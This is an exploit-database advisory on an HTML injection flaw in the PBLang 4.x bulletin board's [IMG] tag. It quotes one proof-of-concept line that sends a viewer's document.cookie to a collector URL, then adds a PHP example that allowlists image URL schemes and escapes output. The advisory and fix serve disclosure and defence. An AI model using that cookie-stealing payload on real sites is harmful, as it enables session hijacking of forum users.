PBLang 4.0/4.56 Bulletin Board System - IMG Tag HTML Injection

Author: Quan Van Truong
type: webapps
platform: php
date_added: 2003-07-28 
date_updated: 2012-11-28 
verified: 1 
codes: OSVDB-2300 

source: https://www.securityfocus.com/bid/8286/info

PBLang is prone to an HTML injection vulnerability. An attacker may exploit this issue by including hostile HTML and script code encapsulated in PBLang tags when posting to the bulletin board. Attacker-supplied code may be rendered in the web browser of a user who views these areas of the site. This would occur in the security context of the site hosting PBLang.

[IMG]javascript:window.open("http://localhost/docs.php?docs="+escape(document.cookie), "subwindows", "height=100,width=486")[/IMG]
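
The usual fix for this class of bug is to allowlist the URL scheme of [IMG] content and escape it for the attribute context before output. The following is an added example, not PBLang's code and not part of the original advisory; the function names `render_img_tag` and `render_post` and the sample posts are hypothetical and constructed for illustration.

```php
<?php
// Added example: hypothetical [IMG] renderer, not PBLang's own code.

// Turn one user-supplied [IMG] URL into a safe <img>, or show it as inert text.
function render_img_tag(string $rawUrl): string
{
    $url = trim($rawUrl);
    $parts = parse_url($url);
    $scheme = is_array($parts) && isset($parts['scheme']) ? strtolower($parts['scheme']) : '';

    // Allowlist: only absolute http(s) URLs with a host, and no control
    // characters or whitespace, may become an image source.
    $ok = in_array($scheme, ['http', 'https'], true)
        && !empty($parts['host'])
        && !preg_match('/[\x00-\x20\x7f]/', $url);
    if (!$ok) {
        return htmlspecialchars('[IMG]' . $rawUrl . '[/IMG]', ENT_QUOTES, 'UTF-8');
    }

    // Escape for the attribute context so a quote cannot close src="...".
    return '<img src="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '" alt="">';
}

// Render a post: text outside [IMG] tags is HTML-escaped, tag bodies are validated.
function render_post(string $post): string
{
    // With one capture group, odd indices hold the tag bodies, even indices the text.
    $pieces = preg_split('/\[IMG\](.*?)\[\/IMG\]/is', $post, -1, PREG_SPLIT_DELIM_CAPTURE);
    $html = '';
    foreach ($pieces as $i => $piece) {
        $html .= ($i % 2 === 1)
            ? render_img_tag($piece)
            : htmlspecialchars($piece, ENT_QUOTES, 'UTF-8');
    }
    return $html;
}

// Constructed sample posts (not taken from the advisory).
$samples = [
    'Look: [IMG]https://example.com/cat.png[/IMG]',      // accepted
    '[IMG]javascript:void(0)[/IMG]',                     // rejected: scheme not allowlisted
    '[IMG]https://example.com/x.png"onerror="y[/IMG]',   // accepted, quotes escaped
    '<b>plain text</b> outside any tag',                 // escaped as text
];
foreach ($samples as $s) {
    echo render_post($s), PHP_EOL;
}
```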